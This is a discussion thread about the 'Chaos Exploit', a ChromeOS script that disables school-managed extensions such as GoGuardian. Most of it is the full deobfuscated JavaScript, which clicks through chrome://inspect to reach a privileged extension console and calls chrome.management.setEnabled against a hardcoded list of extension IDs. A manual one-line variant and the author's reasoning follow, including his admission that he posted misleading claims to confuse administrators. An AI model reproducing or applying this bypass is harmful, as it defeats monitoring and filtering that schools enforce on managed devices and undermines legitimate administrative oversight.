Deobfuscated code

[luphoria]

Cool exploit, but no clue how it works other than attaching to helper internal extensions to disable others. Why is it obfuscated?

[gl91306]

here's the code deobfuscated by me

(function() {

    console.log("Chaos Exploit V1.3");
    console.log("^");

    const D = ["hpamladjhjimikgajbgjmcopoejbpnfp", "kbohafcopfpigkjdimdcdgenlhkmhbnc", "iheobagjkfklnlikgihanlhcddjoihkg", "pgmjaihnmedpcdkjcgigocogcbffgkbn", "jaoebcikabjppaclpgbodmmnfjihdngk", "ifeifkfohlobcbhmlfkenopaimbmnahb", "GoGuardian"];

    let n = `<h1>Exploit in progress</h1><h2>Click on "<u>Console</u>" in the window that pops up.</h2><h2>Then, press Control+V and then Enter.<h2>You can close this page now.</h2>`;

    let A = null;
    let u = null;

    let f = null,
        K = false,
        Y = 0;

    function F() {
        let O = document.querySelectorAll("#extensions-list .row");
        if (!O) {
            console.log("Error 1");
            clearInterval(A);
            return;
        }
        for (let J = 0; J < O.length; J++) {
            console.log(J)
            if (O[J].querySelector(".name").textContent == "Assessment Assistant" || O[J].querySelector(".name").textContent == "Chrome Media Router") {
                console.log(O[J].querySelector(".name").textContent);
                Z();
                openLink(n);
                setTimeout(() => {
                    O[J].querySelector(".action").click();
                }, 100);
                clearInterval(A);
                clearInterval(u);
                clearInterval(f);
                return
            }
        }
        Y++;
        if (Y > 50) {
            console.log("Error 2")
            clearInterval(A);
            return;
        }
    }

    function Q() {
        let i = document.querySelectorAll("#pages-list > .row");
        if (!i) {
            console.log("Error 4");
            return;
        }
        openLink("<h1>Exploit in progress</h1><h2>Wait for the inspect pop-up to open <u>in a new window</u></h2><h2>You can close this page at the end</h2>");
        K = true;
        T();
    }

    function T() {
        let rows = document.querySelectorAll("#pages-list > .row");
        for (let r = 0; r < rows.length; r++) {
            let row = rows[r];
            if (row.querySelector(".url").innerText.startsWith("blob")) {
                row.querySelector(".action").click();
                clearInterval(u);
                return;
            }
        }
        u = setTimeout(T, 500);
    }

    function Z() {
        let rows = document.querySelectorAll("#pages-list > .row");
        for (let r = 0; r < rows.length; r++) {
            let row = rows[r];
            if (row.querySelector(".name").innerText.startsWith("Inspect")) {
                row.querySelector(".action").click();
                return;
            }
        }
    }

    function openLink(url) {
        const header = {
            type: "text/html"
        };
        open(URL.createObjectURL(new File([url], "", header)));
    }

    function k(y) {
        for (let r = 0; r < y.length; r++) {
            chrome.management.setEnabled(y[r], false);
        }
        console.log("Injector V1.0 Done");
        open("https://xlak.github.io/chaos/done.html");
        setTimeout(close, 2e3);
    }
    if (!location.origin.startsWith("chrome-extension://")) {
        if (location.origin != "chrome://inspect") {
            console.log("Wrong page!");
            return;
        }
        A = setInterval(F, 100);
        f = setTimeout(Q, 3e3);
    } else {
        if (!chrome.management) {
            console.log("Error 5");
            return;
        }
        k(D);
        let extensionList = [];
        chrome.management.getAll().then(extensions => {
            extensions.forEach(extension => {
                D.indexOf(extension.name) > -1 && extensionList.push(extension.id);
            });
        });
    }
}());

It's literally just inspect ltbeef with unnecessary bloat. You simply need to go to chrome-extension://gndmhdcefbhlchkhipcnnbkcmicncehk/manifest.json and run chrome.management.setEnabled((extension id), !1); And this is not a kernel level bypass as you stated on r/chrome. That is total bullshit. Its not a privilege escalation exploit either. An example of privilege escalation would be user -> chronos, or chronos -> root. There's also no reason for the code to start at chrome://inspect, and then navigated over to chrome-extension://gndmhdcefbhlchkhipcnnbkcmicncehk or whatever the id for "Chrome Media Router" is.

[luphoria]

(That's an impressive deobfuscation job, by the way) Everything said here is about right tho. It's really confusing that the methodology is so roundabout, when you could just run the setEnabled api on chrome://extensions. I was hoping it would be more involved than that.

[xlak]

Nice deobfuscation job. The code is obfuscated to protect it from being re-branded without permission, and to try to keep it from being patched for longer. However, the comments and the layout are lost through obfuscation which makes what it's doing seem much more confusing.

There is a reason behind why this works the way that it does. It's basically a script to automate opening a console with management permissions, which would be even more tricky otherwise. Running setEnabled from chrome://extensions refuses to work for managed extensions with the error message Error: Extension kbohafcopfpigkjdimdcdgenlhkmhbnc cannot be modified by user. Directly visiting a page from the Chrome Media Router does not seem to work either.

The stuff said on Reddit is just supposed to make it more confusing for admins to block. Most of it is indeed BS, and I should probably delete it.

The full source code is available upon request. Contact me on Discord: xlak_#5475